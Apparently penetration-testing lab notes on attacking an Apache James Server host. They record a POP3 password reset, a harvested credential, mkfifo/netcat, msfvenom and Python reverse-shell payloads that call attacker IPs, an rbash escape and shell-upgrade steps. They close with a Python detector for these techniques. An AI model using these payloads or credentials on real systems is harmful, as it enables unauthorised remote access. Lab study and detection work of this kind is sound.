nc 10.11.1.72 4555
setpassword john newpass
telnet 10.11.1.72 110
USER john
PASS newpass
list
Obtained account credentials: ryuu
QUHqhUPRKXMo4m7k
chsh can change a user's login shell
Apache James Server 2.3.2 - Remote Command Execution - Linux remote Exploit
payload = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.0.45 1337 >/tmp/f' # to exploit only on root
If an error occurs, enter: export PATH="/bin:$PATH"
shell - How does this command work? mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/f - Unix & Linux Stack Exchange
Change the payload: msfvenom -p cmd/unix/reverse_bash LHOST=10.11.0.243 LPORT=4444 -f raw
export PATH=/usr/local/sbin:/usr/local/bin:/usr/bin:/sbin:/bin:$PATH
Escaping the restricted shell (jail)
ssh user@10.11.1.72 'bash --noprofile' sets bash as the shell by default, so rbash is not loaded
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Ctrl+Z
stty raw -echo
fg
reset
stty -a
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows 38 columns 116
Upgrade to a proper shell
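
Detection side of the three shell techniques noted above (the mkfifo/nc payload, the Python socket one-liner, and the ssh 'bash --noprofile' rbash bypass): an added example, not part of the original notes, that matches them in process command-line logs. The (user, cmdline) event format, the rule names and the sample events are assumptions constructed for illustration.

```python
import re

# Every pattern in a rule must match the same command line for the rule to fire.
RULES = {
    "fifo_reverse_shell": [
        r"\bmkfifo\s+\S+",                  # a named pipe is created
        r"\|\s*(/bin/)?(ba)?sh\s+-i\b",     # interactive shell fed from a pipe
        r"\b(nc|ncat|netcat)\b",            # netcat carries the shell's I/O
    ],
    "python_socket_shell": [
        r"\bpython[\d.]*\s+-c\b",
        r"socket\.socket\(",
        r"os\.dup2\(\s*\w+\.fileno\(\)\s*,\s*[012]\s*\)",  # stdio tied to a socket
        r"/bin/(ba)?sh",
    ],
    # Assumption: sshd starts a remote command as "<login shell> -c <command>",
    # so an rbash account asking for a plain shell shows up as below.
    "rbash_bypass": [r"^\S*rbash\s+-c\s+['\"]?(\S*/)?(bash|sh|dash|zsh)\b"],
}
COMPILED = {name: [re.compile(p) for p in pats] for name, pats in RULES.items()}


def classify(cmdline):
    """Return the sorted names of all rules that fully match cmdline."""
    return sorted(n for n, pats in COMPILED.items()
                  if all(p.search(cmdline) for p in pats))


def scan(events):
    """events: iterable of (user, cmdline). Returns (user, rule) alerts."""
    return [(user, rule) for user, cmd in events for rule in classify(cmd)]


# Constructed sample events (argv joined with spaces); 192.0.2.10 is a
# documentation address, not a value from the notes.
SAMPLE = [
    ("james", "sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 1337 >/tmp/f"),
    ("www", 'python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,'
            'socket.SOCK_STREAM);s.connect(("192.0.2.10",1234));os.dup2(s.fileno(),0);'
            'p=subprocess.call(["/bin/sh","-i"]);'),
    ("user", "rbash -c bash --noprofile"),
    ("backup", "rbash -c ls -la"),                       # benign restricted use
    ("app", "mkfifo /var/run/app.fifo"),                 # benign FIFO
    ("ops", "python3 -c import socket; print(socket.gethostname())"),  # benign
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

Requiring all patterns of a rule to match keeps a lone mkfifo, nc or python -c from alerting on its own.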